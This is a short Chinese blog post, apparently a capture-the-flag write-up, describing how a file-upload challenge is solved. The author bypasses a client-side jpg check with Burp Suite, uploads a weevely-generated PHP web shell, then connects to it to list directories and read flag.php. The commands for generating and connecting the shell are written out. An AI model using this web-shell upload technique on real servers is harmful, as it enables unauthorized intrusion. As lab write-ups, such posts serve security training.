上传漏洞

发表于2021-02-25|更新于2024-05-08

|字数总计:151|阅读时长:1分钟|阅读量:

首先，标题是upload，
提示就是上传漏洞
无非就是js拦截，代码拦截，看了以下
网页head头，发现js代码，关键字jpg

burpsuite 抓包，配置代理

weevely 生成一句话

1 2	weevely generate password ./1.php #use weevely在当前目录生成1.php，密码passwd mv 1.php 1.php.jpg

选择文件上传 && burpsuite 抓包删掉.jpg
回显 upload success : upload/1592555994.1.php

weevely 连接

weevely http://220.249.52.133:57535/upload/1592554838.1.php password # weevely 连接
dir # 显示目录
cd ../..
发现flag.php
cat flag.php

得到flag

推荐一个上传漏洞的靶场：https://github.com/c0ny1/upload-labs

文章作者: XR

文章链接: https://xrsec.fun/上传漏洞.html

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 XR-SEC！

水文章笔记安全

相关推荐

2020HVV中的漏洞

Bugku-web指南

DRIFTINGBLUES：6

Hackone 环境搭建

Vulnhub EvilBox靶机打靶过程

评论

✨ 网站已更新最新版本 👉 点击刷新

数据库加载中